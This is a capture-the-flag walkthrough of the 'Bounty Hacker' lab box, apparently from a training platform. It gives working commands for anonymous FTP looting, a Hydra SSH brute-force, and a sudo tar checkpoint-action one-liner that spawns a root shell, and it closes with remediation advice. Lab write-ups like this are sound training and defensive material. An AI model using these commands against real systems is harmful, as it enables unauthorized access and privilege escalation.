Target IP: bounty.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Bounty Hacker” is a Linux machine themed around the anime Cowboy Bebop. The attack path is straightforward: we identify an Anonymous FTP service leaking sensitive files, including a target username (lin) and a potential password list. We perform a credential brute-force attack on SSH to gain initial access. Privilege escalation is achieved by exploiting a misconfigured sudo permission on the tar binary, utilizing the --checkpoint-action flag to execute a system shell as root.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap port enumeration.
  • T1078 (Valid Accounts): Anonymous FTP Access.
  • T1083 (File and Directory Discovery): finding locks.txt and task.txt.
  • T1110 (Brute Force): Hydra attack against SSH.
  • T1548 (Abuse Elevation Control Mechanism): Exploiting sudo rights on tar (GTFOBins).

2. Operational Setup

Host Configuration

echo "10.10.x.x bounty.thm" | sudo tee -a /etc/hosts

Workspace (Tmux)

  • Pane 1 (Recon): nmap, ftp.
  • Pane 2 (Attack): hydra.
  • Pane 3 (Shell): SSH session.

3. Enumeration: “What do we see?”

A. Network Scanning

nmap -A -Pn -oN nmap/bounty bounty.thm

Results:

  • 21/tcp (FTP): vsftpd 3.0.5. Anonymous Login Allowed.
  • 22/tcp (SSH): OpenSSH 8.2p1.
  • 80/tcp (HTTP): Apache 2.4.41.

B. FTP Enumeration (The Leak)

Since Anonymous FTP is open, we check it first.

ftp bounty.thm
# Name: anonymous
# Password: anonymous
ls -la

Files Found:

  1. locks.txt: A list of strings (likely passwords).
  2. task.txt: A text file.

Analysis of task.txt:

“Plan for tonight… protect Vicious… - lin”

Intelligence Gained:

  • Username: lin (Signed the note).
  • Password Candidate List: locks.txt.

4. Initial Access: Credential Stuffing

We have a valid username (lin) and a wordlist (locks.txt). We don’t need rockyou.txt here; the box gave us the dictionary.

Command:

hydra -l lin -P locks.txt ssh://bounty.thm

Result:

  • User: lin
  • Password: RedDr4gonSynd1cat3 (Example, based on the list).

Login:

ssh lin@bounty.thm

User Flag: Located at user.txt.


5. Privilege Escalation: Sudo Tar (GTFOBins)

Enumeration

We check for low-hanging fruit immediately.

sudo -l

Output:

User lin may run the following commands on bounty-hacker:
    (root) /bin/tar

The Vulnerability: Wildcard/Checkpoint Injection

The tar command is used for archiving files. However, it has a feature called Checkpoints.

  • --checkpoint=1: Display a progress message every 1 record.
  • --checkpoint-action=exec=COMMAND: Execute a command at every checkpoint.

If we can run tar as root, we can tell it to execute /bin/sh as a “checkpoint action.”

Exploitation

We run the following command to spawn a root shell.

# Syntax: sudo tar -cf <archive_name> <file_to_archive> <exploit_flags>
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Why this works:

  1. -cf /dev/null: We are creating an archive, but sending the data to the void (we don’t care about the file).
  2. /dev/null: The file we are archiving (again, doesn’t matter).
  3. --checkpoint-action=exec=/bin/sh: The Payload. As soon as tar processes the first file, it triggers this action. Since sudo launched tar as root, /bin/sh spawns as root.

Result:

# id
uid=0(root) gid=0(root) groups=0(root)

Root Flag: /root/root.txt.


6. Remediation (Blue Team)

  1. Disable Anonymous FTP:
  • Set anonymous_enable=NO in /etc/vsftpd.conf.
  • Never store sensitive data (like password lists or internal notes) on public-facing FTP servers.
  1. Sudo Restrictions:
  • Avoid giving sudo access to binaries that allow shell escapes or command execution (like tar, zip, vi, less, awk).
  • If tar is strictly needed for backups, hardcode the arguments in the sudoers file so the user cannot inject flags.
  • Example: lin ALL=(root) /bin/tar -cvf /backup/backup.tar /var/www/html (Prevents flag injection).